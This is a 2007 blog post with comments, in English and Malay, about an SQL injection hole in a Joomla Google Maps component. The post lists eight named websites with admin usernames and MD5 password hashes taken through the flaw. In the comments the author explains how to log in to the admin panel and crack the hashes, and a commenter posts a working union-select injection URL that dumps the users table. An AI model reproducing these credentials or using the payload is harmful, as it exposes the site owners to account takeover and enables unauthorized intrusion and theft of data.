Joomla

Posted by ghimau under
Hmm.. Supposed aunty virus and I need to meet Dato' K, but he's busy. Ah.. thanks god :)

New sql bug in google maps component? Hihihi
Found a lot of vulnerable site. Got their hash password.

http://www.sportzone.org.nz/
SportZone:7235d5430129327c4bb96062bb5ce6bd

http://www.canineclassicsouth.org/
carolk:26bde2e3315cdd3066a2200e50c69968

http://www.backtohealthphysio.com/
admin:6b59fe8975a7fd2a5baa0381ffe426c9

http://www.rockandrollarmy.com/
admin:23497d01fe41a83ffbef68e3c040a4f2

http://www.basecampone.com/
admin:b76226c510f89744059663b242c9242d

http://www.asianlinkstravel.com/
admin:21232f297a57a5a743894a0e4a801fc3

http://www.islengineering.com/
islengin:033f123b9e92e3d5dcef9b84bebd2189

http://www.surfangoaustralia.com/
sam:ea4cc36b29c9ef8457b0087f8f7d9791

Use it at your own risk. This is just a proof of concept, how sql injection can retrive valuable and sensitive informations.


Hacked by me :)

12 comments:

On 1 August 2007 at 11:44 , viruspadu said...

yahooooooooo...
hari ni dpt rehat sikit
yabedabeduuuuuuuu

 
On 1 August 2007 at 11:48 , ghimau said...

yes yes yes

 
On 1 August 2007 at 17:19 , Unknown said...

halo, saya dari indonesia. cara masuk admin-nya bagaimana?

bagaimana cara mempergunakan password yang didapat dari joomla sql inject.

trims, please kirim jawaban anda ke cagle_shop@yahoo.com

A.S.A.P
Fajar

 
On 1 August 2007 at 23:00 , blabla said...

hey, here rockandrollarmy's webmaster, nice job, thanks for de advise!

 
On 2 August 2007 at 07:56 , ghimau said...

jay : untuk masuk admin gunakan url seperti ini http://www.siteanda.com/administrator

password yang diperolehi adalah dalam bentuk md5 hash. Anda perlu brute force atau crack hash itu terlebih dahulu untuk mendapatkan passwordnya

marusheena : sorry for the disclosure. If there's anything, you can just contact me

 
On 2 August 2007 at 16:47 , Myalycia said...

woitttt en hakes... dgr2 mlm nie kena kejer ekkk.. ingat, mlm nie mlm jumaat.. jgn peristiwa dulu berulang kembali hik hik...

~ aku yg sekadar menginatkan ~

 
On 2 August 2007 at 20:11 , blabla said...

no prob.!

 
On 3 August 2007 at 11:09 , ghimau said...

takper alycia.. malam tadi bukan sorang2.. aunty virus pun ada.. :)

 
On 3 August 2007 at 11:43 , فيصل said...

wow.. aku pun nak cuba la camni.. 2 hari bercuti demam selsema..

 
On 3 August 2007 at 12:24 , فيصل said...

owh..aku baru try kat website dalam utm.. ada gak yang vuln..
tapi macam susah gak die nak crack password tu.. amik masa lama gak la

index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

 
On 6 August 2007 at 09:54 , ghimau said...

cool :)

 
On 7 August 2007 at 10:15 , yan said...

pemerhati PBB

 
Post a Comment

Pengikut Setia

Ghimau's Logo

Ghimau's Logo

Pingkey's Logo

Pingkey's Logo

Betkidz's Logo

Betkidz's Logo

Jato Tangge's Logo

Jato Tangge's Logo

My Book

My Book
Buku ni den tongah baco. Menarik buku ni untuk dibaco,

Syntax Highlighter